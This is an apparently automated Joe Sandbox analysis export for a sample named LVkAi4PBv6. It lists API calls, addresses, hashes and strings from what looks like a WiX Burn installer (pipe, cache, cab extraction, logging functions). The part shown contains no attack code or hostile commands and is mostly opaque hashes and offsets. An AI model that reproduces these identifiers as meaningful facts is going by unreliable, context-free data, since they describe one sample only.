                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnvironmentExpandFullNamePathStrings
                                                                                                                                                                                                                                                                                                  • String ID: @$pathutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1547313835-3022285739
                                                                                                                                                                                                                                                                                                  • Opcode ID: dc2d6aad73c513d4e05246bf850bad99b4d66173f863740737a771b62e92fa1a
                                                                                                                                                                                                                                                                                                  • Instruction ID: a8695382e783fb97de12cb727fcc0a21f72f8333eed945780150a912fc67d604
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc2d6aad73c513d4e05246bf850bad99b4d66173f863740737a771b62e92fa1a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F961BD33D0062ABBDB219AE48C54B9EBAA9FB05766F134165EE01FB240E775DF0487D0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00874DC0
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00874DEF
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00874E3A
                                                                                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000027), ref: 00874E66
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                                                                                                                                                  • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4041566446-2510341293
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbd9afeebd6548267d0e03a5a71ed9e56fd570bfff4d4c76d42ccbbfe1e3ae7e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6af49a5093cb3966eeb2377a30b6de968b8e90f0671d3385f8021956d0c2f217
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbd9afeebd6548267d0e03a5a71ed9e56fd570bfff4d4c76d42ccbbfe1e3ae7e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43418A72D00318ABDB20DBE8C946EDEBBF8FB45720F204126E909FB245D7759904CB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 00866062
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 00866076
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00866088
                                                                                                                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 008660DC
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008660E6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variant value., xrefs: 00866124
                                                                                                                                                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 008660AD
                                                                                                                                                                                                                                                                                                  • variable.cpp, xrefs: 008660A3, 00866101
                                                                                                                                                                                                                                                                                                  • Failed to get the Date., xrefs: 0086610B
                                                                                                                                                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 008660C4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8668a65c84fb2b72bc7045341489bfdd9681860a4f943e6f26848302b410b92c
                                                                                                                                                                                                                                                                                                  • Instruction ID: debf5e0f27f482efe7071bf1a3333130a5344660bc7861d30cb409c02a1c69ca
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8668a65c84fb2b72bc7045341489bfdd9681860a4f943e6f26848302b410b92c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A131CD32A4076A7BDB119BE9CC42FAF7A78FB05710F120035FE01F7241E6659D4046E2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,0086548E,?,?), ref: 0087EA9D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086548E,?,?), ref: 0087EAAA
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087E7B4,?,00000000,00000000), ref: 0087EB03
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086548E,?,?), ref: 0087EB10
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,0086548E,?,?), ref: 0087EB4B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,0086548E,?,?), ref: 0087EB6A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0086548E,?,?), ref: 0087EB77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                                                                                                                                                  • Opcode ID: c04d6c9eb8c8d0a75f2a729e413478bcd5c9aef022901c72a8abbf9b13f4374c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 87b90fbdb100063fd428e14ed353ef7f2a331d36d7fb2a2c9de8857c355a4a7b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c04d6c9eb8c8d0a75f2a729e413478bcd5c9aef022901c72a8abbf9b13f4374c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB319676D01229BBD711DFA98D85A9EFBA8FF08360F114165F914F7241E670DE0086A1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?,0086548E,?,?), ref: 0087E666
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0086548E,?,?), ref: 0087E673
                                                                                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0087E3C8,00000000,00000000,00000000), ref: 0087E6D2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0086548E,?,?), ref: 0087E6DF
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,0086548E,?,?), ref: 0087E71A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0086548E,?,?), ref: 0087E72E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,0086548E,?,?), ref: 0087E73B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2351989216-1977201954
                                                                                                                                                                                                                                                                                                  • Opcode ID: b91c736aad12bb36d8bdcd5d48ef5324003d556aca2e964e0bd2ab7331843ff1
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5aa7b10d908e1053f2f4b1c5718da4e113dae65b688a3d869f27ccf1393629e4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b91c736aad12bb36d8bdcd5d48ef5324003d556aca2e964e0bd2ab7331843ff1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C31A476D00629BBDB218B99CC45A9FBBB8FF59710F1181A6FD14F7240E7749900CAE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,771B2F60,?,?,00865405,008653BD,00000000,00865445), ref: 00881506
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00881519
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(008AB488,?), ref: 0088155B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00881569
                                                                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(008AB460), ref: 008815A4
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008815AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                                                                                                                                                  • Opcode ID: b886dca446e12385f388a90fae9a78d8697b019220f6c08c541195223c7e5869
                                                                                                                                                                                                                                                                                                  • Instruction ID: 16488e6268a97d58bbafe4538678dcab82cc6f8afe474935d2ba2c17b8724b20
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b886dca446e12385f388a90fae9a78d8697b019220f6c08c541195223c7e5869
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E31C870A00205EBEB10AF698D09BAF7BFCFF44710B10416AF916D6660EB75CA019B61
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(008AB478,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?), ref: 0088161B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489), ref: 00881625
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(008AB488,000000FF,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489), ref: 0088165F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000,?,00865489,FFF9E89D,00865489), ref: 00881669
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816B4
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816C3
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00865489,?,00000000,?,0086C1D3,?,008653BD,00000000,?,0087784D,?,0086566D,00865479,00865479,00000000), ref: 008816D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1206859064-226982402
                                                                                                                                                                                                                                                                                                  • Opcode ID: 03455a1da3b734120479f796e934ec647e49b1ed6c15fce8ee953fef58af8532
                                                                                                                                                                                                                                                                                                  • Instruction ID: eb1c9c2dffa1b71949b8a5002e05f8cc77e91a71971727e28ff238f4f919fdeb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03455a1da3b734120479f796e934ec647e49b1ed6c15fce8ee953fef58af8532
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3214932500A32B7DB21AB65CC0D756B6A8FF14721F150221E844E1E90FB74EC51CBD9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0523: EnterCriticalSection.KERNEL32(008CB5FC,00000000,?,?,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A0533
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0523: LeaveCriticalSection.KERNEL32(008CB5FC,?,?,008CB5F4,?,00874207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,008654FA,?), ref: 008A067A
                                                                                                                                                                                                                                                                                                  • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00874212
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0087421E
                                                                                                                                                                                                                                                                                                  • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,008B39D4,00000000), ref: 0087426B
                                                                                                                                                                                                                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 00874272
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                                                                                                                                                  • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                                                                                                                                                  • API String ID: 1844635321-1389066741
                                                                                                                                                                                                                                                                                                  • Opcode ID: 083e1d82f7b5dc4353387f473dc7306f6c98d72f3bc448cb2498731fd41fac68
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5698b71f0ddd19bf2eab33a0f1c7cbdc33ddce83e9e3bba9e00bacc583ee8586
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 083e1d82f7b5dc4353387f473dc7306f6c98d72f3bc448cb2498731fd41fac68
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF08132A91A727AA73226A65C0ADBB5C6CFA87F317120114BE24F5386DB58C90185F5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0087949E
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 008794C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-4263581490
                                                                                                                                                                                                                                                                                                  • Opcode ID: b1c923b66fbed7a1e421d61e74b8a79be91b1dfed79443ed0761a946ec6d316d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ea977d2f8f5a0983313545e4e0fcdd961748b84a17a8d542453773712f171c1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c923b66fbed7a1e421d61e74b8a79be91b1dfed79443ed0761a946ec6d316d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F718272D00229ABDB11DFD8CC41AEEB7B8FB09710F154225E959FB295E734DD408BA1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0087E577
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000082,?,?), ref: 0087E5B5
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0087E5C2
                                                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB,?), ref: 0087E5D1
                                                                                                                                                                                                                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 0087E5DF
                                                                                                                                                                                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 0087E5EB
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0087E5FC
                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0087E61E
                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0087E626
                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0087E629
                                                                                                                                                                                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0087E637
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 409979828-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 89fb29dae2f44c4aed34abed0122dbbd4800f42e0196472013e7dd44c2e872d2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0b1bc160460872de27f95bf847c9e242be42d7398964af6c88ef354201f6a1f4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89fb29dae2f44c4aed34abed0122dbbd4800f42e0196472013e7dd44c2e872d2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA217832104208BFEB255F68DC18D7B3FA8FB5A364B058558F61AD62BAD7718810DBA0
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 0087A26C
                                                                                                                                                                                                                                                                                                  • Failed to get bundle layout directory property., xrefs: 0087A287
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 0087A1B7
                                                                                                                                                                                                                                                                                                  • WixBundleLastUsedSource, xrefs: 0087A1A1
                                                                                                                                                                                                                                                                                                  • Failed to copy source path., xrefs: 0087A31A
                                                                                                                                                                                                                                                                                                  • Failed to get current process directory., xrefs: 0087A1F3
                                                                                                                                                                                                                                                                                                  • Failed to combine layout source with source., xrefs: 0087A2A4
                                                                                                                                                                                                                                                                                                  • Failed to combine last source with source., xrefs: 0087A210
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 2767606509-3003062821
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d31524049a4760a62a40ba4e93c5536be24954662631b98bd28f9c19a2891a3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1dad4d8b3a0b0570fa41782839ec7b59d8d4cc1d211833f82877f2ed5730f2b6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d31524049a4760a62a40ba4e93c5536be24954662631b98bd28f9c19a2891a3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F719C32D05619ABDF1ADFA8C841AEEBBB9FF48310F114129E915F7250E735DD408B62
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00862E5F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00862E69
                                                                                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00862F09
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00862F96
